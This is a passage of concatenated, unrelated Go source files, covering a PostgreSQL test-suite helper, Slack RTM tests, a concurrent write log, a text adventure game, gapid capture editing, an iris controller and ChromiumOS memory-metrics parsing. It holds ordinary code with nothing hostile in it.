if err := fileLock.Unlock(); err != nil {
log.Panic(err)
}
log.Printf("package %s is attempting to connect to database %s", packageName.String(), dbNamePackage)
// Prepare a new connection to the temporary database with the same PostgreSQL role privileges
// as what the migrations task will have when running migrations. These privileges will be
// higher than the role that runs application.
highPrivConnDetails := pop.ConnectionDetails{
Dialect: dbDialect,
Driver: "postgres",
Database: dbNamePackage,
Host: dbHost,
Port: dbPortTest,
User: dbUser,
Password: dbPassword,
Options: dbOptions,
}
highPrivsConn, highPrivsConnErr := pop.NewConnection(&highPrivConnDetails)
if highPrivsConnErr != nil {
log.Panic(highPrivsConnErr)
}
if openErr := highPrivsConn.Open(); openErr != nil {
log.Panic(openErr)
}
// Prepare a new connection to the temporary database with the same PostgreSQL role privileges
// as what the application will have when running the server. These privileges will be lower
// than the role that runs database migrations.
lowPrivConnDetails := pop.ConnectionDetails{
Dialect: dbDialect,
Driver: "postgres",
Database: dbNamePackage,
Host: dbHost,
Port: dbPortTest,
User: dbUserLowPriv,
Password: dbPasswordApp,
Options: dbOptions,
}
lowPrivsConn, lowPrivsConnErr := pop.NewConnection(&lowPrivConnDetails)
if lowPrivsConnErr != nil {
log.Panic(lowPrivsConnErr)
}
if openErr := lowPrivsConn.Open(); openErr != nil {
log.Panic(openErr)
}
// Create a standardized PopTestSuite object.
pts := &PopTestSuite{
lowPrivConn: lowPrivsConn,
highPrivConn: highPrivsConn,
origConn: origConn,
lowPrivConnDetails: &lowPrivConnDetails,
highPrivConnDetails: &highPrivConnDetails,
origConnDetails: &origConnDetails,
PackageName: packageName,
}
// Apply the user-supplied options to the PopTestSuite object.
for _, opt := range opts {
opt(pts)
}
return *pts
}
// DB returns a db connection
func (suite *PopTestSuite) DB() *pop.Connection {
return suite.lowPrivConn
}
// Truncate deletes all data from the specified tables.
func (suite *PopTestSuite) Truncate(tables []string) error {
// Truncate the specified tables.
for _, table := range tables {
sql := fmt.Sprintf("TRUNCATE TABLE %s CASCADE", table)
if err := suite.highPrivConn.RawQuery(sql).Exec(); err != nil {
return err
}
}
return nil
}
// TruncateAll deletes all data from all tables that are owned by the user connected to the
// database.
func (suite *PopTestSuite) TruncateAll() error {
return suite.highPrivConn.TruncateAll()
}
// MustSave requires saving without errors
func (suite *PopTestSuite) MustSave(model interface{}) {
t := suite.T()
t.Helper()
verrs, err := suite.lowPrivConn.ValidateAndSave(model)
if err != nil {
suite.T().Errorf("Errors encountered saving %v: %v", model, err)
}
if verrs.HasAny() {
suite.T().Errorf("Validation errors encountered saving %v: %v", model, verrs)
}
}
// MustCreate requires creating without errors
func (suite *PopTestSuite) MustCreate(db *pop.Connection, model interface{}) {
t := suite.T()
t.Helper()
verrs, err := db.ValidateAndCreate(model)
if err != nil {
suite.T().Errorf("Errors encountered creating %v: %v", model, err)
}
if verrs.HasAny() {
suite.T().Errorf("Validation errors encountered creating %v: %v", model, verrs)
}
}
// MustDestroy requires deleting without errors
func (suite *PopTestSuite) MustDestroy(model interface{}) {
t := suite.T()
t.Helper()
err := suite.lowPrivConn.Destroy(model)
if err != nil {
suite.T().Errorf("Errors encountered destroying %v: %v", model, err)
}
}
// NoVerrs prints any errors it receives
func (suite *PopTestSuite) NoVerrs(verrs *validate.Errors) bool {
if !suite.False(verrs.HasAny()) {
fmt.Println(verrs.String())
return false
}
return true
}
// TearDown runs the teardown for step for the suite
// Important steps are to close open DB connections and drop the DB
func (suite *PopTestSuite) TearDown() {
// disconnect from the package DB connections
if err := suite.lowPrivConn.Close(); err != nil {
log.Panic(err)
}
if err := suite.highPrivConn.Close(); err != nil {
log.Panic(err)
}
// Try to obtain the lock in this method within 10 minutes
lockCtx, cancel := context.WithTimeout(context.Background(), 600*time.Second)
defer cancel()
// Continually check if the lock is available
_, lockErr := fileLock.TryLockContext(lockCtx, 678*time.Millisecond)
if lockErr != nil {
log.Panic(lockErr)
}
// reconnect to the original DB
origConn, origConnErr := pop.NewConnection(suite.origConnDetails)
if origConnErr != nil {
log.Panic(origConnErr)
}
if openErr := origConn.Open(); openErr != nil {
log.Panic(openErr)
}
// Remove the package DB
if err := dropDB(origConn, (*suite.lowPrivConnDetails).Database); err != nil {
log.Panic(err)
}
// disconnect from the original DB
if err := origConn.Close(); err != nil {
log.Panic(err)
}
// Release the lock so other tests can clone the DB
if err := fileLock.Unlock(); err != nil {
log.Panic(err)
}
}
|
package rtmapi
import (
"encoding/json"
"github.com/oklahomer/golack/v2/event"
"strings"
"testing"
)
func TestMarshalPingEvent(t *testing.T) {
ping := &Ping{
OutgoingEvent: OutgoingEvent{
ID: 1,
TypedEvent: event.TypedEvent{Type: "ping"},
},
}
val, err := json.Marshal(ping)
if err != nil {
t.Fatalf("error occured while encoding. %s.", err.Error())
}
if strings.Contains(string(val), "ping") != true {
t.Fatalf(`returned string doesn't contain "ping". %s.`, string(val))
}
}
func TestUnmarshalPingEvent(t *testing.T) {
str := `{"type": "ping", "id": 123}`
ping := &Ping{}
if err := json.Unmarshal([]byte(str), ping); err != nil {
t.Errorf("error on Unmarshal. %s.", err.Error())
return
}
if ping.Type != "ping" {
t.Errorf("something is wrong with unmarshaled result. %#v.", ping)
}
if ping.ID != 123 {
t.Errorf("unmarshaled id is wrong %d. expecting %d.", ping.ID, 123)
}
}
func TestNewOutgoingMessage(t *testing.T) {
channelID := event.ChannelID("channel")
message := "dummy message"
outgoingMessage := NewOutgoingMessage(channelID, message)
if outgoingMessage.ChannelID != channelID {
t.Errorf("Passed channelID is not set: %s.", outgoingMessage.ChannelID)
}
if outgoingMessage.Text != message {
t.Errorf("Passed message is not set: %s.", outgoingMessage.Text)
}
}
func TestOutgoingMessage_WithThreadTimeStamp(t *testing.T) {
timeStamp := &event.TimeStamp{}
message := &OutgoingMessage{}
message.WithThreadTimeStamp(timeStamp)
if message.ThreadTimeStamp != timeStamp {
t.Errorf("Passed timestamp is not set: %s.", message.ThreadTimeStamp)
}
}
|
package database
import (
"encoding/gob"
"log"
"os"
"sync"
)
type Writelog struct {
Index map[int64]int64
}
type ConcurrentWriteLog struct {
// logs and inverted together form a bimap
Logs []Writelog
Inverted []Writelog
Concurrency int64
mutexes []sync.RWMutex
}
func (ci *ConcurrentWriteLog) add(writeId int64, ptr int64) {
i := writeId % int64(ci.Concurrency)
log := ci.Logs[i]
ci.mutexes[i].Lock()
log.Index[writeId] = ptr
ci.mutexes[i].Unlock()
j := ptr % int64(ci.Concurrency)
ci.mutexes[j].Lock()
defer ci.mutexes[j].Unlock()
inverted := ci.Inverted[j]
inverted.Index[ptr] = writeId
}
func (cwl *ConcurrentWriteLog) get(writeId int64) (int64, bool) {
i := writeId % cwl.Concurrency
log := cwl.Logs[i]
cwl.mutexes[i].RLock()
defer cwl.mutexes[i].RUnlock()
val, ok := log.Index[writeId]
return val, ok
}
func (cwl *ConcurrentWriteLog) getWriteId(ptr int64) (int64, bool) {
i := ptr % cwl.Concurrency
inverted := cwl.Inverted[i]
cwl.mutexes[i].RLock()
defer cwl.mutexes[i].RUnlock()
val, ok := inverted.Index[ptr]
return val, ok
}
func NewWriteLog(concurrency int64) *ConcurrentWriteLog {
logs := make([]Writelog, 0)
inverted := make([]Writelog, 0)
mutexes := make([]sync.RWMutex, 0)
for i := 0; i < int(concurrency); i++ {
logs = append(logs, Writelog{Index: make(map[int64]int64)})
inverted = append(inverted, Writelog{Index: make(map[int64]int64)})
mutexes = append(mutexes, *new(sync.RWMutex))
}
return &ConcurrentWriteLog{Logs: logs, Inverted: inverted, mutexes: mutexes, Concurrency: concurrency}
}
func (cwl *ConcurrentWriteLog) save(location string) (bool, error) {
file, err := os.Create(location)
if err != nil {
log.Fatalf("Unable to open index file %v", err)
return false, err
}
defer file.Close()
encoder := gob.NewEncoder(file)
err = encoder.Encode(cwl)
if err != nil {
log.Fatalf("Unable to encode data to file %v", err)
return false, err
}
return true, nil
}
func LoadWriteLog(location string) (*ConcurrentWriteLog, error) {
file, err := os.OpenFile(location, os.O_RDONLY, 0666)
if err != nil {
log.Fatalf("Unable to open file %v", err)
return nil, err
}
defer file.Close()
decoder := gob.NewDecoder(file)
writelog := new(ConcurrentWriteLog)
err = decoder.Decode(writelog)
if err != nil {
log.Fatalf("Unable to read index file %v", err)
return nil, err
}
mutexes := make([]sync.RWMutex, 0)
for i := 0; i < int(writelog.Concurrency); i++ {
mutexes = append(mutexes, *new(sync.RWMutex))
}
writelog.mutexes = mutexes
return writelog, nil
}
|
package adventure
import (
"encoding/json"
"fmt"
"net/http"
"os"
"strconv"
"github.com/labstack/echo/v4"
)
type (
Adventure map[string]Arc
Arc struct {
Title string
Story []string
Options []ArcOption
}
ArcOption struct {
Text string
Arc string
}
Game struct {
Adventure Adventure
CurrentArc string
}
WebGame struct {
Adventure Adventure
DefaultArc string
}
)
func LoadAdventure(path string) (Adventure, error) {
f, err := os.Open(path)
if err != nil {
return nil, err
}
defer f.Close()
var adv Adventure = make(map[string]Arc)
err = json.NewDecoder(f).Decode(&adv)
if err != nil {
return nil, err
}
return adv, nil
}
func (g *Game) PlayCli() {
playing := true
for playing {
arc, ok := g.Adventure[g.CurrentArc]
if !ok {
fmt.Println("unknown adventure arc, how did you get here?")
os.Exit(1)
}
fmt.Println(arc.Title, "\n")
for _, p := range arc.Story {
fmt.Println(p, "\n")
}
for i, o := range arc.Options {
fmt.Printf("%d: %s\n", i+1, o.Text)
}
fmt.Println("(q to quit)")
playing = g.handleInput()
}
}
func (g *Game) handleInput() bool {
for {
var input string
fmt.Printf("What will you do? ")
fmt.Scanf("%s", &input)
switch input {
case "q", "quit", "exit":
return false
default:
i, err := strconv.Atoi(input)
if err != nil || i <= 0 || i > len(g.Adventure[g.CurrentArc].Options) {
fmt.Println("Bad choice...")
break
}
g.CurrentArc = g.Adventure[g.CurrentArc].Options[i-1].Arc
return true
}
}
}
func (g *WebGame) HandleDefaultArc() echo.HandlerFunc {
return func(c echo.Context) error {
return c.Render(http.StatusOK, "story.html", g.Adventure[g.DefaultArc])
}
}
func (g *WebGame) HandleArc() echo.HandlerFunc {
return func(c echo.Context) error {
arc := c.Param("arc")
if _, ok := g.Adventure[arc]; !ok {
return echo.ErrNotFound
}
return c.Render(http.StatusOK, "story.html", g.Adventure[arc])
}
}
|
// Copyright (C) 2017 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package resolve
import (
"context"
"fmt"
"reflect"
"github.com/google/gapid/core/data/deep"
"github.com/google/gapid/core/data/dictionary"
"github.com/google/gapid/core/memory/arena"
"github.com/google/gapid/gapis/api"
"github.com/google/gapid/gapis/capture"
"github.com/google/gapid/gapis/database"
"github.com/google/gapid/gapis/messages"
"github.com/google/gapid/gapis/service"
"github.com/google/gapid/gapis/service/path"
)
// Set creates a copy of the capture referenced by the request's path, but
// with the object, value or memory at p replaced with v. The path returned is
// identical to p, but with the base changed to refer to the new capture.
func Set(ctx context.Context, p *path.Any, v interface{}, r *path.ResolveConfig) (*path.Any, error) {
obj, err := database.Build(ctx, &SetResolvable{Path: p, Value: service.NewValue(v), Config: r})
if err != nil {
return nil, err
}
return obj.(*path.Any), nil
}
// Resolve implements the database.Resolver interface.
func (r *SetResolvable) Resolve(ctx context.Context) (interface{}, error) {
ctx = SetupContext(ctx, path.FindCapture(r.Path.Node()), r.Config)
a := arena.New()
v, err := serviceToInternal(a, r.Value.Get())
if err != nil {
return nil, err
}
p, err := change(ctx, a, r.Path.Node(), v, r.Config)
if err != nil {
return nil, err
}
return p.Path(), nil
}
func change(ctx context.Context, a arena.Arena, p path.Node, val interface{}, r *path.ResolveConfig) (path.Node, error) {
switch p := p.(type) {
case *path.Report:
return nil, fmt.Errorf("Reports are immutable")
case *path.MultiResourceData:
data, ok := val.(*api.MultiResourceData)
if !ok {
return nil, fmt.Errorf("Expected ResourceData, got %T", val)
}
c, err := changeResources(ctx, a, p.After, p.IDs, data.Resources, r)
if err != nil {
return nil, err
}
return &path.MultiResourceData{
IDs: p.IDs, // TODO: Shouldn't this change?
After: &path.Command{
Capture: c,
Indices: p.After.Indices,
},
}, nil
case *path.ResourceData:
data, ok := val.(*api.ResourceData)
if !ok {
return nil, fmt.Errorf("Expected ResourceData, got %T", val)
}
c, err := changeResources(ctx, a, p.After, []*path.ID{p.ID}, []*api.ResourceData{data}, r)
if err != nil {
return nil, err
}
return &path.ResourceData{
ID: p.ID, // TODO: Shouldn't this change?
After: &path.Command{
Capture: c,
Indices: p.After.Indices,
},
}, nil
case *path.Command:
cmdIdx := p.Indices[0]
if len(p.Indices) > 1 {
return nil, fmt.Errorf("Cannot modify subcommands") // TODO: Subcommands
}
// Resolve the command list
oldCmds, err := NCmds(ctx, p.Capture, cmdIdx+1)
if err != nil {
return nil, err
}
// Validate the value
if val == nil {
return nil, fmt.Errorf("Command cannot be nil")
}
cmd, ok := val.(api.Cmd)
if !ok {
return nil, fmt.Errorf("Expected Cmd, got %T", val)
}
// Clone the command list
cmds := make([]api.Cmd, len(oldCmds))
copy(cmds, oldCmds)
// Propagate extras if the new command omitted them
oldCmd := oldCmds[cmdIdx]
if len(cmd.Extras().All()) == 0 {
cmd.Extras().Add(oldCmd.Extras().All()...)
}
// Propagate caller (not exposed to client)
cmd.SetCaller(oldCmd.Caller())
// Replace the command
cmds[cmdIdx] = cmd
// Store the new command list
c, err := changeCommands(ctx, a, p.Capture, cmds)
if err != nil {
return nil, err
}
return &path.Command{
Capture: c,
Indices: p.Indices,
}, nil
case *path.Commands:
return nil, fmt.Errorf("Commands can not be changed directly")
case *path.State:
return nil, fmt.Errorf("State can not currently be mutated")
case *path.Field, *path.Parameter, *path.ArrayIndex, *path.MapIndex:
oldObj, err := ResolveInternal(ctx, p.Parent(), r)
if err != nil {
return nil, err
}
obj, err := clone(reflect.ValueOf(oldObj))
if err != nil {
return nil, err
}
switch p := p.(type) {
case *path.Parameter:
// TODO: Deal with parameters belonging to sub-commands.
cmd := obj.Interface().(api.Cmd)
err := api.SetParameter(cmd, p.Name, val)
switch err {
case nil:
case api.ErrParameterNotFound:
return nil, &service.ErrInvalidPath{
Reason: messages.ErrParameterDoesNotExist(cmd.CmdName(), p.Name),
Path: p.Path(),
}
default:
return nil, err
}
parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
if err != nil {
return nil, err
}
return parent.(*path.Command).Parameter(p.Name), nil
case *path.Result:
// TODO: Deal with parameters belonging to sub-commands.
cmd := obj.Interface().(api.Cmd)
err := api.SetResult(cmd, val)
switch err {
case nil:
case api.ErrResultNotFound:
return nil, &service.ErrInvalidPath{
Reason: messages.ErrResultDoesNotExist(cmd.CmdName()),
Path: p.Path(),
}
default:
return nil, err
}
parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
if err != nil {
return nil, err
}
return parent.(*path.Command).Result(), nil
case *path.Field:
parent, err := setField(ctx, a, obj, reflect.ValueOf(val), p.Name, p, r)
if err != nil {
return nil, err
}
out := &path.Field{Name: p.Name}
out.SetParent(parent)
return out, nil
case *path.ArrayIndex:
arr, ty := obj, obj.Type()
switch arr.Kind() {
case reflect.Array, reflect.Slice:
ty = ty.Elem()
case reflect.String:
default:
return nil, &service.ErrInvalidPath{
Reason: messages.ErrTypeNotArrayIndexable(typename(arr.Type())),
Path: p.Path(),
}
}
val, ok := convert(reflect.ValueOf(val), ty)
if !ok {
return nil, fmt.Errorf("Slice or array at %s has element of type %v, got type %v",
p.Parent(), ty, val.Type())
}
if count := uint64(arr.Len()); p.Index >= count {
return nil, errPathOOB(p.Index, "Index", 0, count-1, p)
}
if err := assign(arr.Index(int(p.Index)), val); err != nil {
return nil, err
}
parent, err := change(ctx, a, p.Parent(), arr.Interface(), r)
if err != nil {
return nil, err
}
p = &path.ArrayIndex{Index: p.Index}
p.SetParent(parent)
return p, nil
case *path.MapIndex:
d := dictionary.From(obj.Interface())
if d == nil {
return nil, &service.ErrInvalidPath{
Reason: messages.ErrTypeNotMapIndexable(typename(obj.Type())),
Path: p.Path(),
}
}
keyTy, valTy := d.KeyTy(), d.ValTy()
key, ok := convert(reflect.ValueOf(p.KeyValue()), keyTy)
if !ok {
return nil, &service.ErrInvalidPath{
Reason: messages.ErrIncorrectMapKeyType(
typename(reflect.TypeOf(p.KeyValue())), // got
typename(keyTy)), // expected
Path: p.Path(),
}
}
val, ok := convert(reflect.ValueOf(val), d.ValTy())
if !ok {
return nil, fmt.Errorf("Map at %s has value of type %v, got type %v",
p.Parent(), valTy, val.Type())
}
d.Add(key.Interface(), val.Interface())
parent, err := change(ctx, a, p.Parent(), obj.Interface(), r)
if err != nil {
return nil, err
}
p = &path.MapIndex{Key: p.Key}
p.SetParent(parent)
return p, nil
}
}
return nil, fmt.Errorf("Unknown path type %T", p)
}
func changeResources(ctx context.Context, a arena.Arena, after *path.Command, ids []*path.ID, data []*api.ResourceData, r *path.ResolveConfig) (*path.Capture, error) {
meta, err := ResourceMeta(ctx, ids, after, r)
if err != nil {
return nil, err
}
if len(meta.Resources) != len(ids) {
return nil, fmt.Errorf("Expected %d resource(s), got %d", len(ids), len(meta.Resources))
}
cmdIdx := after.Indices[0]
// If we change resource data, subcommands do not affect this, so change
// the main command.
oldCmds, err := NCmds(ctx, after.Capture, cmdIdx+1)
if err != nil {
return nil, err
}
cmds := make([]api.Cmd, len(oldCmds))
copy(cmds, oldCmds)
replaceCommands := func(where uint64, with interface{}) {
cmds[where] = with.(api.Cmd)
}
oldCapt, err := capture.ResolveGraphicsFromPath(ctx, after.Capture)
if err != nil {
return nil, err
}
var initialState *capture.InitialState
mutateInitialState := func(API api.API) api.State {
if initialState == nil {
if initialState = oldCapt.CloneInitialState(a); initialState == nil {
return nil
}
}
return initialState.APIs[API]
}
for i, resource := range meta.Resources {
if err := resource.SetResourceData(
ctx,
after,
data[i],
meta.IDMap,
replaceCommands,
mutateInitialState,
r); err != nil {
return nil, err
}
}
if initialState == nil {
initialState = oldCapt.InitialState
}
gc, err := capture.NewGraphicsCapture(ctx, a, oldCapt.Name()+"*", oldCapt.Header, initialState, cmds)
if err != nil {
return nil, err
} else {
return capture.New(ctx, gc)
}
}
func changeCommands(ctx context.Context, a arena.Arena, p *path.Capture, newCmds []api.Cmd) (*path.Capture, error) {
old, err := capture.ResolveGraphicsFromPath(ctx, p)
if err != nil {
return nil, err
}
c, err := capture.NewGraphicsCapture(ctx, a, old.Name()+"*", old.Header, old.InitialState, newCmds)
if err != nil {
return nil, err
}
return capture.New(ctx, c)
}
func setField(
ctx context.Context,
a arena.Arena,
str,
val reflect.Value,
name string,
p path.Node,
r *path.ResolveConfig) (path.Node, error) {
dst, err := field(ctx, str, name, p)
if err != nil {
return nil, err
}
if err := assign(dst, val); err != nil {
return nil, err
}
return change(ctx, a, p.Parent(), str.Interface(), r)
}
func clone(v reflect.Value) (reflect.Value, error) {
var o reflect.Value
switch v.Kind() {
case reflect.Slice:
o = reflect.MakeSlice(v.Type(), v.Len(), v.Len())
case reflect.Map:
o = reflect.MakeMap(v.Type())
default:
o = reflect.New(v.Type()).Elem()
}
return o, shallowCopy(o, v)
}
func shallowCopy(dst, src reflect.Value) error {
switch dst.Kind() {
case reflect.Ptr, reflect.Interface:
if !src.IsNil() {
o := reflect.New(src.Elem().Type())
shallowCopy(o.Elem(), src.Elem())
dst.Set(o)
}
case reflect.Slice, reflect.Array:
reflect.Copy(dst, src)
case reflect.Map:
for _, k := range src.MapKeys() {
val := src.MapIndex(k)
dst.SetMapIndex(k, val)
}
default:
dst.Set(src)
}
return nil
}
func assign(dst, src reflect.Value) error {
if !dst.CanSet() {
return fmt.Errorf("Value is unassignable")
}
return deep.Copy(dst.Addr().Interface(), src.Interface())
}
|
package pretend
//lint:file-ignore U1000 Ignore all unused code
const Assignment = `{
"content_groups": [
[
{
"label": "content_group_label",
"value": [
"string",
"details"
]
},
{
"label": "title",
"value": [
"string",
"Blacksmith - Menaro District"
]
},
{
"label": "description",
"value": [
"string",
"Specialize in strong iron found natively in and around Menaro"
]
},
{
"label": "time_share_x100",
"value": [
"int64",
100
]
},
{
"label": "deferred_perc_x100",
"value": [
"int64",
100
]
}
]
]
}`
|
package controller
import (
"github.com/kataras/iris/mvc"
"xdream/example/webserver/data/api"
"xdream/web"
"fmt"
"github.com/kataras/iris"
"xdream/example/webserver/middleware"
"xdream/logger"
)
type IndexController struct {
BaseController
cnt int
}
func init() {
web.RegisterController(new(IndexController), "", middleware.PerControllerHandler)
}
// BeforeActivation called once before the server start
// and before the controller's registration, here you can add
// dependencies, to this controller and only, that the main caller may skip.
func (c *IndexController) AfterActivation(b mvc.AfterActivation) {
// select the route based on the method name you want to
// modify.
index := b.GetRoute("GetHello")
// just prepend the handler(s) as middleware(s) you want to use.
// or append for "done" handlers.
index.Handlers = append([]iris.Handler{middleware.PerActionHandler}, index.Handlers...)
fmt.Println("============AfterActivation ")
//log.Printf("request url:%s timeUsed:%v \n", c.Ctx.Request().RequestURI, time.Since(c.StartTime))
}
func (c *IndexController)GetHello() ( mvc.Result) {
c.Ctx.Application().Logger().Infof("action execute")
res := api.UserInfo{}
res.RespInfo.Code = 100
res.RespInfo.Msg = fmt.Sprintf("ok:%d", c.cnt)
res.User.Id = "abc"
res.User.Name = "fank xu"
c.cnt++
return c.ObjectResponse(res)
}
func (c *IndexController)GetLog() ( mvc.Result) {
web.App.Logger().Debugf("[iris] debug msg")
web.App.Logger().Info("[iris] info msg")
logger.ZLogger.Debug("[zap] debug msg")
logger.ZLogger.Info("[zap] info msg")
return c.ObjectResponse(web.RespInfo{})
}
func (c *IndexController)GetPanic() {
panic("abc")
} |
// Copyright 2021 The ChromiumOS Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package memory
import (
"context"
"encoding/json"
"fmt"
"io/ioutil"
"path"
"regexp"
"strconv"
"strings"
"github.com/shirou/gopsutil/v3/process"
"golang.org/x/sync/errgroup"
"chromiumos/tast/common/perf"
"chromiumos/tast/errors"
"chromiumos/tast/local/memory/kernelmeter"
"chromiumos/tast/testing"
)
// NameToCategoryMetricsMap maps a process category name to its key PSS metrics.
type NameToCategoryMetricsMap map[string]*CategoryHostMetrics
// CategoryHostMetrics has a summary of host HostMetrics
// we keep on a per-category basis for reporting.
// All values in Kilobytes.
type CategoryHostMetrics struct {
Pss uint64
PssSwap uint64
PssGuest uint64
}
// HostSummary captures a few key data items that are used to compute
// overall system memory status.
// All values are expressed in Kilobytes.
type HostSummary struct {
MemTotal uint64
MemFree uint64
HostCachedKernel uint64
CategoryMetrics NameToCategoryMetricsMap
}
// SharedInfo holds shared memory use information for one process.
// SharedSwapPss is the amount of swap used by shared memory regions divided by
// the number of times those regions are mapped.
// CrosvmGuestPss is the sum of the Pss used by the crosvm_guest region,
// (which means memory from the VM mapped on the host).
type SharedInfo struct {
SharedSwapPss uint64
CrosvmGuestPss uint64
}
// NamedSmapsRollup is a SmapsRollup plus the process name and ID, and
// information on shared memory use (Shared field).
type NamedSmapsRollup struct {
Command string
Pid int32
Shared *SharedInfo
Rollup map[string]uint64
}
// SharedInfoMap maps process ids to shared memory information.
type SharedInfoMap map[int32]*SharedInfo
var smapsRollupRE = regexp.MustCompile(`(?m)^([^:]+):\s*(\d+)\s*kB$`)
// NewSmapsRollup parses the contents of a /proc/<pid>/smaps_rollup file. All
// sizes are in bytes.
func NewSmapsRollup(smapsRollupFileData []byte) (map[string]uint64, error) {
result := make(map[string]uint64)
matches := smapsRollupRE.FindAllSubmatch(smapsRollupFileData, -1)
if matches == nil {
return nil, errors.Errorf("failed to parse smaps_rollup file %q", string(smapsRollupFileData))
}
for _, match := range matches {
field := string(match[1])
kbString := string(match[2])
kb, err := strconv.ParseUint(kbString, 10, 64)
if err != nil {
return nil, errors.Wrapf(err, "failed to parse %q value from smaps_rollup: %q", field, kbString)
}
result[field] = kb
}
return result, nil
}
// smapsRollups returns a NamedSmapsRollup for every process in processes.
// It also fills the passed summary struct with PSS data about the crosvm * processes.
// Sizes are in bytes.
// The Shared field is initialized from sharedInfoMap, if provided.
func smapsRollups(ctx context.Context, processes []*process.Process, sharedInfoMap SharedInfoMap, summary *HostSummary) ([]*NamedSmapsRollup, error) {
rollups := make([]*NamedSmapsRollup, len(processes))
g, ctx := errgroup.WithContext(ctx)
for index, process := range processes {
// All these are captured by value in the closure - and that is what we want.
i := index
p := process
g.Go(func() error {
// We're racing with this process potentially exiting, so just
// ignore errors and don't generate a NamesSmapsRollup if we fail to
// read anything from proc.
smapsData, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/smaps_rollup", p.Pid))
if err != nil {
// Not all processes have a smaps_rollup, this process may have
// exited.
return nil
} else if len(smapsData) == 0 {
// On some processes, smaps_rollups exists but is empty.
return nil
}
command, err := p.Cmdline()
if err != nil {
// Process may have died between reading smapsData and now, so
// just ignore errors here.
testing.ContextLogf(ctx, "SmapsRollups failed to get Cmdline for process %d: %s", p.Pid, err)
return nil
}
rollup, err := NewSmapsRollup(smapsData)
if err != nil {
return errors.Wrapf(err, "failed to parse /proc/%d/smaps_rollup", p.Pid)
}
rollups[i] = &NamedSmapsRollup{
Command: command,
Pid: p.Pid,
Rollup: rollup,
Shared: sharedInfoMap[p.Pid],
}
return nil
})
}
if err := g.Wait(); err != nil {
return nil, errors.Wrap(err, "failed to wait for all smaps_rollup parsing to be done")
}
var result []*NamedSmapsRollup
for _, rollup := range rollups {
if rollup != nil {
result = append(result, rollup)
}
}
return result, nil
}
// sharedSwapPssRE matches smaps entries that are mapped shared, with the
// following match groups:
// [1] The name of the mapping.
// [2] The RSS for that mapping within this process, in kIB
// [3] The PSS for that mapping within this process, in kIB
// [4] The size of swapped out pages in the mapping, in kiB.
var sharedSwapPssRE = regexp.MustCompile(`(?m)^[[:xdigit:]]+-[[:xdigit:]]+ [-r][-w][-x]s [[:xdigit:]]+ [[:xdigit:]]+:[[:xdigit:]]+ ([\d]+) +(\S[^\n]*)$
(?:^\w+: +[^\n]+$
)*^Rss: +(\d+) kB$
(?:^\w+: +[^\n]+$
)*^Pss: +(\d+) kB$
(?:^\w+: +[^\n]+$
)*^Swap: +(\d+) kB$`)
// SharedMapping contains information parsed from a smaps entry. Numbers are KiB.
type SharedMapping struct {
name string
swap uint64
pss uint64
rss uint64
inode uint64
}
// ParseSmapsData parses the given smaps data.
func ParseSmapsData(data []byte) ([]SharedMapping, error) {
var swaps []SharedMapping
matches := sharedSwapPssRE.FindAllSubmatch(data, -1)
for _, match := range matches {
inode, err := strconv.ParseUint(string(match[1]), 10, 64)
if err != nil {
return nil, errors.Wrapf(err, "failed to parse inode %q", match[1])
}
name := string(match[2])
rssKiB, err := strconv.ParseUint(string(match[3]), 10, 64)
if err != nil {
return nil, errors.Wrapf(err, "failed to parse rss value %q", match[3])
}
pssKiB, err := strconv.ParseUint(string(match[4]), 10, 64)
if err != nil {
return nil, errors.Wrapf(err, "failed to parse pss value %q", match[4])
}
swapKiB, err := strconv.ParseUint(string(match[5]), 10, 64)
if err != nil {
return nil, errors.Wrapf(err, "failed to parse swap value %q", match[5])
}
rss := rssKiB
pss := pssKiB
swap := swapKiB
swaps = append(swaps, SharedMapping{name, swap, pss, rss, inode})
}
return swaps, nil
}
// makeSharedInfoMap creates a map from Pid to the amount of SwapPss used by shared
// mappings per process. The SwapPss field in smaps_rollup does not include
// memory swapped out of shared mappings. In order to calculate a complete
// SwapPss, we parse smaps for all shared mappings in all processes, and then
// divide their "Swap" value by the number of times the shared memory is mapped.
func makeSharedInfoMap(ctx context.Context, processes []*process.Process) (SharedInfoMap, error) {
g, ctx := errgroup.WithContext(ctx)
procSwaps := make([][]SharedMapping, len(processes))
for index, process := range processes {
i := index
pid := process.Pid
g.Go(func() error {
smapsData, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/smaps", pid))
if err != nil {
// Not all processes have a smaps_rollup, this process may have
// exited.
return nil
}
smaps, err := ParseSmapsData(smapsData)
if err != nil {
return err
}
procSwaps[i] = smaps
return nil
})
}
if err := g.Wait(); err != nil {
return nil, errors.Wrap(err, "failed to wait for all smaps parsing to be done")
}
// Count how many times each shared mapping has been mapped.
mapCount := make(map[string]uint64)
for _, swaps := range procSwaps {
for _, swap := range swaps {
mapCount[swap.name]++
}
}
// Use the counts to divide each mapping's swap size to compute SwapPss.
// Also stack up each process's share of the crosvm_guest mapping
sharedInfoMap := make(SharedInfoMap)
for i, swaps := range procSwaps {
pid := processes[i].Pid
sharedInfo := &SharedInfo{}
sharedInfoMap[pid] = sharedInfo
for _, swap := range swaps {
if strings.HasPrefix(swap.name, "/memfd:crosvm_guest") {
sharedInfo.CrosvmGuestPss += swap.pss
}
sharedInfo.SharedSwapPss += swap.swap / mapCount[swap.name]
}
}
return sharedInfoMap, nil
}
type processCategory struct {
commandRE *regexp.Regexp
name string
}
// processCategories defines categories used to aggregate per-process memory
// metrics. The first commandRE to match a process' command line defines its
// category.
var processCategories = []processCategory{
{
commandRE: regexp.MustCompile(`^/usr/bin/crosvm run.*/arcvm.sock`),
name: "crosvm_arcvm",
}, {
commandRE: regexp.MustCompile(`^/usr/bin/crosvm`),
name: "crosvm_other",
}, {
commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=renderer`),
name: "chrome_renderer",
}, {
commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=gpu-process`),
name: "chrome_gpu",
}, {
commandRE: regexp.MustCompile(`^/opt/google/chrome/chrome.*--type=`),
name: "chrome_other",
